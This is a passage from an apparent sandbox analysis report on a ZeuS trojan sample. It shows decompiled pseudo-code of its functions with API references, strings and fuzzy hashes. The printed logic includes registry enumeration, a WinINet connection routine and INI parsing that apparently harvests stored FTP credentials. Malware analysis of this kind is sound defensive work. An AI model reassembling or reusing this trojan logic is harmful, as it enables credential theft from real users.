						_t23 = E0040930A(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
						if(_t23 != 0 && _t23 != 0xffffffff) {
							PathUnquoteSpacesW(_t34);
							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
							asm("sbb bl, bl");
							_t28 = 1;
						}
					}
					LocalFree(_a4);
				}
				return _t28;
			}

0x0041c090
0x0041c097
0x0041c099
0x0041c0a1
0x0041c0ab
0x0041c0b1
0x0041c0b2
0x0041c0b7
0x0041c0c2
0x0041c0c8
0x0041c0ce
0x0041c0d1
0x0041c0d8
0x0041c0d9
0x0041c0f0
0x0041c0f7
0x0041c101
0x0041c10e
0x0041c11a
0x0041c11c
0x0041c11c
0x0041c0f7
0x0041c121
0x0041c128
0x0041c12d

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0041C099
LocalFree.KERNEL32(?,.exe,00000000), ref: 0041C121

Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F

PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 0041C101
ExpandEnvironmentStringsW.KERNEL32(?,0040C9C8,00000104), ref: 0041C10E

Strings

.exe, xrefs: 0041C0A8

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
String ID: .exe
API String ID: 2200435814-4119554291
Opcode ID: 14a15fd33eee4f45c73627c565362af2645708ba34c01fb8064f5876fa03c7e2
Instruction ID: a729619f4423994d1209396ef62e371aefd833b587cd2e4ded0b0aeaecac43ad
Opcode Fuzzy Hash: 14a15fd33eee4f45c73627c565362af2645708ba34c01fb8064f5876fa03c7e2
Instruction Fuzzy Hash: D011A3716801147BDB206B79DD49ECB3BADDF49360F100036F945E71A2D738D948CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406DBA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406DBA(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t18 = 0;
				do {
					_t1 = _t18 + 0x422394; // 0x422394
					_t2 = _t18 + 0x422390; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t18 = _t18 + 8;
				} while (_t18 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}

0x00406dba
0x00406dba
0x00406dc0
0x00406dc2
0x00406dc2
0x00406dd7
0x00406ddb
0x00406e1f
0x00000000
0x00406e1f
0x00406dde
0x00406de0
0x00406de2
0x00406de9
0x00406df0
0x00406df6
0x00406df9
0x00406e0d
0x00406e16
0x00406e19
0x00000000
0x00406e19
0x00406e23

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00406DD1
InternetSetOptionA.WININET(00000000,00000002,00422394,00000004), ref: 00406DF0
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0D
InternetCloseHandle.WININET(00000000), ref: 00406E19

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00406DC2, 00406DD0

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpenOption
String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
API String ID: 910987326-3737944857
Opcode ID: 57dabc19f3743528ed3bf9e38b1874f99336e9ad2a3f22947d7599881aa23f03
Instruction ID: 104acf2318a2c1de783130ca48f64a6fdd92c4eb16af169abbf69d0e5035e856
Opcode Fuzzy Hash: 57dabc19f3743528ed3bf9e38b1874f99336e9ad2a3f22947d7599881aa23f03
Instruction Fuzzy Hash: 88F0F6722002107AD72257718C8CD6B7D6DEBCA761B05083DF647F5160C5358860C77C

Uniqueness

Uniqueness Score: -1.00%

Function 0040D74C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D74C(void* __edx) {
				long _v8;
				char _v116;
				void _v220;
				void* __esi;
				void* _t8;
				void* _t12;
				void* _t18;

				_t18 = __edx;
				_t8 = GetThreadDesktop(GetCurrentThreadId());
				if(_t8 != 0) {
					_t8 = GetUserObjectInformationW(_t8, 2,  &_v220, 0x64,  &_v8);
					if(_t8 != 0 && _v8 == 0x4e) {
						E0041C946(0x2937498d,  &_v116, 0);
						_t8 = E00405257( &_v116,  &_v220, 0x4c);
						if(_t8 == 0) {
							_t12 = E0040D35A( &_v220, _t18, 0x423238, _t8);
							if(_t12 == 0) {
								return E0040D5C5(0x423238, 0);
							}
							 *0x4239b0 =  *0x4239b0 | 0x00000004;
							return _t12;
						}
					}
				}
				return _t8;
			}

0x0040d74c
0x0040d75d
0x0040d765
0x0040d777
0x0040d77f
0x0040d792
0x0040d7a2
0x0040d7a9
0x0040d7b1
0x0040d7b8
0x00000000
0x0040d7c7
0x0040d7ba
0x00000000
0x0040d7ba
0x0040d7a9
0x0040d77f
0x0040d7ce

APIs

GetCurrentThreadId.KERNEL32 ref: 0040D756
GetThreadDesktop.USER32(00000000), ref: 0040D75D
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,0041C50A), ref: 0040D777

Part of subcall function 0040D35A: TlsAlloc.KERNEL32(00423238,00000000,0000018C,00000000,00000000), ref: 0040D373

Strings

82B, xrefs: 0040D7AC
N, xrefs: 0040D781

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Thread$AllocCurrentDesktopInformationObjectUser
String ID: 82B$N
API String ID: 454308152-516153583
Opcode ID: f9c437e52553a3991fcd26ee11e77d435c291a48d2c2a83acdecce5b9b1653be
Instruction ID: 6e7f2f08a23886c0ae38c79b8d7c30d657d9da291addb003bc5e3897857841e8
Opcode Fuzzy Hash: f9c437e52553a3991fcd26ee11e77d435c291a48d2c2a83acdecce5b9b1653be
Instruction Fuzzy Hash: C801A770D10215AEEB10ABE0DD46FAB367CAB00748F00007EB605B71D1EB789A0DCA6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040722E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040722E() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E00405644( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}

0x0040723d
0x0040723f
0x00407245
0x0040724a
0x00407252
0x0040725a
0x00407260
0x00407267
0x0040726d
0x0040726e
0x00407271
0x0040727b
0x00407280
0x00407282
0x00407282
0x00407288
0x0040729e
0x0040729e
0x004072a0
0x004072a4
0x004072a4
0x004072ae

APIs

LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040723F
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00407252
FreeLibrary.KERNEL32(?), ref: 004072A4

Strings

urlmon.dll, xrefs: 00407238
ObtainUserAgentString, xrefs: 0040724C

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ObtainUserAgentString$urlmon.dll
API String ID: 145871493-2685262326
Opcode ID: 40cf98ebd64b1ecbcb738f233a27fdfa92c11e5e8691efe9f67e7f2ef9490a0e
Instruction ID: 2b433a8b03aa3d484467e336033286d55d5276299d6334b3ab5159da996dee9b
Opcode Fuzzy Hash: 40cf98ebd64b1ecbcb738f233a27fdfa92c11e5e8691efe9f67e7f2ef9490a0e
Instruction Fuzzy Hash: D40171B1D04258BBCB509BE89D855DE7BB8AB04340F2005FEB655F3290DA389F448A69

Uniqueness

Uniqueness Score: -1.00%

Function 004163B8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004163B8(intOrPtr _a4, intOrPtr _a12) {
				void* __esi;
				void* _t6;
				signed int _t7;

				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x423420);
					_t7 = E00415D7F(_a4);
					if(_t7 != 0xffffffff) {
						_t7 = SetEvent( *(_t7 * 0x24 +  *0x423438 + 4));
					}
					LeaveCriticalSection(0x423420);
					return _t7;
				}
				return _t6;
			}

0x004163bd
0x004163ce
0x004163d8
0x004163e0
0x004163ef
0x004163ef
0x004163f6
0x00000000
0x004163fd
0x004163fe

APIs

EnterCriticalSection.KERNEL32(00423420), ref: 004163CE
SetEvent.KERNEL32(?), ref: 004163EF
LeaveCriticalSection.KERNEL32(00423420), ref: 004163F6

Strings

3, xrefs: 004163BF
4B, xrefs: 004163C8

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: 4B$3
API String ID: 3094578987-1166831345
Opcode ID: e5f4af89493170819fe0cd47ec46aac9746dab06f549c6dee930b1ede170d669
Instruction ID: 4f38a9cf12bd69e0c80c397ca9cf9bd98304455763abbb6d53c5bbefd3dd37e1
Opcode Fuzzy Hash: e5f4af89493170819fe0cd47ec46aac9746dab06f549c6dee930b1ede170d669
Instruction Fuzzy Hash: FEE06D31104100EBC721AB25A94889AB764EA96336B01C1BEF425A21B0CB38D8928A2A

Uniqueness

Uniqueness Score: -1.00%

Function 00414A27, Relevance: 7.7, APIs: 5, Instructions: 202
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00414A27(char* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				signed int _v16;
				char* _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				char* _v48;
				char _v60;
				char _v80;
				char _v100;
				char _v120;
				char _v152;
				char _v216;
				char _v284;
				short _v804;
				void* __edi;
				void* __esi;
				intOrPtr _t70;
				int _t102;
				int _t110;
				int _t114;
				void* _t115;
				signed int _t117;
				void* _t119;
				intOrPtr _t121;
				void* _t124;
				intOrPtr _t127;
				int _t134;
				intOrPtr _t136;
				char* _t138;
				char* _t141;
				signed int _t145;
				void* _t146;
				void* _t147;

				_t129 = __ecx;
				_t70 = E004051B6(0xc08);
				_t127 = _t70;
				_t134 = 0;
				_v24 = _t127;
				if(_t127 == 0) {
					return _t70;
				} else {
					E0040F34A(0x83,  &_v216);
					_t141 =  &_v284;
					E0040F34A(0x84, _t141);
					_v48 =  &_v216;
					_v44 = _t141;
					E00405299( &_v36,  &_v36, 0, 8);
					E0040F34A(0x85,  &_v120);
					E0040F34A(0x86,  &_v100);
					E0040F34A(0x87,  &_v60);
					_t145 =  &_v80;
					E0040F34A(0x88, _t145);
					_t12 = _t127 + 0x3fc; // 0x3fc
					_v20 = _t12;
					_v16 = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
							goto L22;
						}
						_v28 = _t134;
						_v8 = 0x104;
						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
							L21:
							RegCloseKey(_v12);
							goto L22;
						} else {
							goto L4;
						}
						do {
							L4:
							_t136 = _v24;
							_v28 = _v28 + 1;
							_t102 = E0040930A(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
							_t145 = _t145 | 0xffffffff;
							_v8 = _t102;
							if(_t102 != _t145 && _t102 != 0) {
								_t137 = _t136 + 0x1fe;
								_t110 = E0040930A(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
								_v8 = _t110;
								if(_t110 == _t145 || _t110 == 0) {
									_t114 = E0040930A(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
									_v8 = _t114;
									if(_t114 == _t145 || _t114 == 0) {
										goto L19;
									} else {
										goto L10;
									}
								} else {
									L10:
									_t115 = _v12;
									_t129 =  &_v804;
									_v40 = _t115;
									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
										_t117 = _t145;
									} else {
										_t145 =  &_v40;
										_t117 = E00409432(_t145,  &_v80, _t116, _v20, 0xff);
									}
									_v8 = _t117;
									if(_t117 != 0xffffffff && _t117 != 0) {
										_t138 = _v20;
										if(E004149CD(_t138) > 0) {
											_t145 =  &_v152;
											_t119 = 0x56;
											E0040F34A(_t119, _t145);
											_t121 = _v24;
											_push(_t121);
											_t129 = _t138;
											_push(_t138);
											_push(_t121 + 0x1fe);
											_t124 = E00405ED9(_t145, 0x307, _t138 + 0x1fe, _t145);
											_t147 = _t147 + 0x10;
											if(_t124 > 0) {
												_t129 =  &_v36;
												if(E004055DA(_t124,  &_v36, _v20 + 0x1fe) != 0) {
													_v32 = _v32 + 1;
												}
											}
										}
									}
									goto L19;
								}
							}
							L19:
							_v8 = 0x104;
						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
						_t134 = 0;
						goto L21;
						L22:
						_v16 = _v16 + 1;
					} while (_v16 < 2);
					E004051E6(_v24);
					if(_v32 <= _t134) {
						return E004051E6(_v36);
					}
					return E0041293E(0x307, _v36, 0xcb);
				}
			}

0x00414a27
0x00414a38
0x00414a3d
0x00414a3f
0x00414a41
0x00414a46
0x00414c9f
0x00414a4c
0x00414a57
0x00414a5c
0x00414a67
0x00414a72
0x00414a79
0x00414a81
0x00414a8e
0x00414a9b
0x00414aa8
0x00414aad
0x00414ab5
0x00414aba
0x00414ac0
0x00414ac3
0x00414acb
0x00414ae6
0x00000000
0x00000000
0x00414aff
0x00414b02
0x00414b11
0x00414c5c
0x00414c5f
0x00000000
0x00000000
0x00000000
0x00000000
0x00414b17
0x00414b17
0x00414b17
0x00414b1a
0x00414b2c
0x00414b31
0x00414b34
0x00414b39
0x00414b56
0x00414b5c
0x00414b61
0x00414b66
0x00414b7b
0x00414b80
0x00414b85
0x00000000
0x00000000
0x00000000
0x00000000
0x00414b93
0x00414b93
0x00414b93
0x00414b9e
0x00414ba6
0x00414bb1
0x00414bc6
0x00414bb3
0x00414bb7
0x00414bbf
0x00414bbf
0x00414bc8
0x00414bce
0x00414bd4
0x00414bde
0x00414be2
0x00414be8
0x00414be9
0x00414bee
0x00414bf1
0x00414bf2
0x00414bf4
0x00414bfa
0x00414c09
0x00414c0e
0x00414c13
0x00414c1f
0x00414c29
0x00414c2b
0x00414c2b
0x00414c29
0x00414c13
0x00414bde
0x00000000
0x00414bce
0x00414b66
0x00414c2e
0x00414c42
0x00414c52
0x00414c5a
0x00000000
0x00414c65
0x00414c65
0x00414c68
0x00414c75
0x00414c7d
0x00000000
0x00414c96
0x00000000
0x00414c8c

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 00414ADE
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00414B09
RegCloseKey.ADVAPI32(?), ref: 00414C5F

Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00414C4C

Part of subcall function 0040930A: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041C0F5,?,?,00000104), ref: 004093A0

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 00414BA9

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 8c6a3115731f816fc8e74562e7c8324fe478208e28648832730cded4eb5e1f89
Instruction ID: ef94988da21e9bdeda12d3fe619bc01620b3d4e747c4035f87d1dd888b5c9646
Opcode Fuzzy Hash: 8c6a3115731f816fc8e74562e7c8324fe478208e28648832730cded4eb5e1f89
Instruction Fuzzy Hash: 58714972D00119ABDB10DBE5CD45EEFB7BCEB88314F10447AB905F3291E678AE858B64

Uniqueness

Uniqueness Score: -1.00%

Function 00413AED, Relevance: 7.7, APIs: 5, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00413AED(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				char _v564;
				short _v576;
				short _v588;
				short _v600;
				short _v608;
				WCHAR* _v612;
				WCHAR* _v616;
				WCHAR* _v620;
				WCHAR* _v624;
				WCHAR* _v628;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t51;
				WCHAR* _t54;
				WCHAR* _t56;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t63;
				long _t67;
				WCHAR* _t69;
				long _t77;
				long _t80;
				WCHAR* _t82;
				void* _t83;
				WCHAR* _t86;
				WCHAR* _t87;
				short* _t92;
				WCHAR* _t93;
				int _t102;
				WCHAR* _t107;
				intOrPtr _t114;
				signed int _t115;
				void* _t117;

				_t117 = (_t115 & 0xfffffff8) - 0x26c;
				if(E0040AA77( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L19:
					return 1;
				}
				_t120 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t107 = E004051B6(0x1fffe);
					_v612 = _t107;
					__eflags = _t107;
					if(_t107 == 0) {
						goto L19;
					}
					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
					__eflags = _t51;
					if(_t51 == 0) {
						L18:
						E004051E6(_t107);
						goto L19;
					}
					_t9 =  &(_t51[0]); // 0x1
					_t54 = E00406096(_t107, _t9);
					__eflags = _t54;
					if(_t54 == 0) {
						goto L18;
					}
					_t56 = E004051B6(0xc1c);
					_v620 = _t56;
					__eflags = _t56;
					if(_t56 != 0) {
						_t11 =  &(_t56[0xff]); // 0x1fe
						_t92 = _t11;
						_v624 = _t107;
						_v616 = _t92;
						_t57 = 0x5c;
						_t93 =  &(_t92[0xff]);
						__eflags = _t93;
						E0040F34A(_t57,  &_v608);
						_t59 = 0x5d;
						E0040F34A(_t59,  &_v588);
						_t61 = 0x5e;
						E0040F34A(_t61,  &_v576);
						_t63 = 0x5f;
						E0040F34A(_t63,  &_v600);
						do {
							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
							__eflags = _t67;
							if(_t67 != 0) {
								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
								_t25 = _t102 - 1; // -1
								__eflags = _t25 - 0xfffe;
								if(_t25 <= 0xfffe) {
									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
									__eflags = _t77;
									if(_t77 != 0) {
										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
										__eflags = _t80;
										if(_t80 != 0) {
											_t82 = E004139E0(_v624, _t93);
											__eflags = _t82;
											if(_t82 > 0) {
												_t113 =  &_v564;
												_t83 = 0x55;
												E0040F34A(_t83,  &_v564);
												_push(_t102);
												_push(_v620);
												_push(_t93);
												_push(_v616);
												_t37 =  &(_t93[0xff]); // 0x1fe
												_t103 = _t37;
												_t86 = E00405ED9(_t113, 0x311, _t37, _t113);
												_t117 = _t117 + 0x14;
												__eflags = _t86;
												if(_t86 > 0) {
													_t114 = _a4;
													_t87 = E004055DA(_t86, _t114, _t103);
													__eflags = _t87;
													if(_t87 != 0) {
														_t39 = _t114 + 4;
														 *_t39 =  &(( *(_t114 + 4))[0]);
														__eflags =  *_t39;
													}
												}
											}
										}
									}
								}
							}
							_t69 = E004060D2(_v624, 1);
							_v628 = _t69;
							__eflags = _t69;
						} while (_t69 != 0);
						E004051E6(_v620);
						_t107 = _v616;
					}
					goto L18;
				} else {
					E00413A93(_t120,  &_v524, _a4);
					goto L19;
				}
			}

0x00413af3
0x00413b0e
0x00413cd0
0x00413cd8
0x00413cd8
0x00413b14
0x00413b17
0x00413b35
0x00413b37
0x00413b3b
0x00413b3d
0x00000000
0x00000000
0x00413b54
0x00413b5a
0x00413b5c
0x00413cca
0x00413ccb
0x00000000
0x00413ccb
0x00413b62
0x00413b67
0x00413b6c
0x00413b6e
0x00000000
0x00000000
0x00413b79
0x00413b7e
0x00413b82
0x00413b84
0x00413b8a
0x00413b8a
0x00413b92
0x00413b96
0x00413b9e
0x00413b9f
0x00413b9f
0x00413ba5
0x00413bb0
0x00413bb1
0x00413bbc
0x00413bbd
0x00413bc8
0x00413bc9
0x00413bce
0x00413be8
0x00413bee
0x00413bf0
0x00413c0c
0x00413c0e
0x00413c11
0x00413c16
0x00413c31
0x00413c37
0x00413c39
0x00413c4d
0x00413c53
0x00413c55
0x00413c5b
0x00413c60
0x00413c62
0x00413c66
0x00413c6a
0x00413c6b
0x00413c70
0x00413c71
0x00413c77
0x00413c78
0x00413c82
0x00413c82
0x00413c88
0x00413c8d
0x00413c90
0x00413c92
0x00413c94
0x00413c9a
0x00413c9f
0x00413ca1
0x00413ca3
0x00413ca3
0x00413ca3
0x00413ca3
0x00413ca1
0x00413c92
0x00413c62
0x00413c55
0x00413c39
0x00413c16
0x00413cac
0x00413cb1
0x00413cb5
0x00413cb5
0x00413cc1
0x00413cc6
0x00413cc6
0x00000000
0x00413b19
0x00413b21
0x00000000
0x00413b21

APIs

Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96

GetPrivateProfileStringW.KERNEL32 ref: 00413B54
GetPrivateProfileStringW.KERNEL32 ref: 00413BE8
GetPrivateProfileIntW.KERNEL32 ref: 00413C06
GetPrivateProfileStringW.KERNEL32 ref: 00413C31
GetPrivateProfileStringW.KERNEL32 ref: 00413C4D

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: 94ca71887976c4fb54c84a065d582a469aa087435feef25e095cc6f9dce7f5fc
Instruction ID: 47977c205ffba1438f5a46821d8cb108c6e69742872f42f6c02cf4ebb7498966
Opcode Fuzzy Hash: 94ca71887976c4fb54c84a065d582a469aa087435feef25e095cc6f9dce7f5fc
Instruction Fuzzy Hash: 7151B332508705ABD720DF61CC05FEB77E8FF84755F00093ABA44A72A1E739EA458B96

Uniqueness

Uniqueness Score: -1.00%

Function 0040B05B, Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040B05B(void* __ecx, signed int __edx, void** __esi, long _a4) {
				char _v5;
				void _v16;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* _t29;
				signed int _t31;
				int _t38;
				int _t39;
				signed int _t41;
				int _t42;
				int _t45;
				intOrPtr _t48;
				void* _t49;
				signed int _t53;
				struct _OVERLAPPED* _t54;
				void** _t56;

				_t56 = __esi;
				_t53 = __edx;
				_t49 = __ecx;
				_t54 = 0;
				_v5 = 0;
				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *__esi = _t29;
				if(_t29 != 0xffffffff) {
					_t31 = E0040A521(_t49, _t29);
					_v36 = _t31;
					_v32 = _t53;
					if((_t31 & _t53) == 0xffffffff) {
						L4:
						CloseHandle( *_t56);
						 *_t56 =  *_t56 | 0xffffffff;
					} else {
						if((_t31 | _t53) == 0) {
							L18:
							_t56[2] = _t56[2] | 0xffffffff;
							_t25 =  &(_t56[3]);
							 *_t25 = _t56[3] | 0xffffffff;
							__eflags =  *_t25;
							_v5 = 1;
							E0040A4D1( *_t56, _t54, _t54, _t54);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t54;
									if(_a4 == _t54) {
										goto L18;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L16:
										_t38 = E0040A4D1( *_t56, _v28, _v24, _t54);
										__eflags = _t38;
										if(_t38 == 0) {
											goto L4;
										} else {
											_t39 = SetEndOfFile( *_t56);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									} else {
										_t41 = _v16 ^ _t56[4];
										asm("adc edi, [ebp-0x14]");
										_t48 = _t41 + _v28 + 5;
										asm("adc edi, ecx");
										_v16 = _t41;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L15:
											_t54 = 0;
											__eflags = 0;
											goto L16;
										} else {
											if(__eflags < 0) {
												L11:
												__eflags = _t41 - 0xa00000;
												if(_t41 > 0xa00000) {
													goto L15;
												} else {
													_t42 = E0040A4D1( *_t56, _t41, 0, 1);
													__eflags = _t42;
													if(_t42 == 0) {
														goto L4;
													} else {
														_v28 = _t48;
														_v24 = 0;
														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
														__eflags = _t45;
														if(_t45 != 0) {
															_t54 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L4;
														}
													}
												}
											} else {
												__eflags = _t48 - _v36;
												if(_t48 > _v36) {
													goto L15;
												} else {
													goto L11;
												}
											}
										}
									}
									goto L19;
								}
								goto L18;
							} else {
								goto L4;
							}
						}
					}
				}
				L19:
				return _v5;
			}

0x0040b05b
0x0040b05b
0x0040b05b
0x0040b063
0x0040b078
0x0040b07c
0x0040b082
0x0040b087
0x0040b08e
0x0040b097
0x0040b09a
0x0040b0a0
0x0040b0c7
0x0040b0c9
0x0040b0cf
0x0040b0a2
0x0040b0a4
0x0040b16c
0x0040b16c
0x0040b170
0x0040b170
0x0040b170
0x0040b179
0x0040b17d
0x0040b0aa
0x0040b0b7
0x0040b0ba
0x0040b0c5
0x0040b0d9
0x0040b0d9
0x0040b0dc
0x00000000
0x00000000
0x0040b0e2
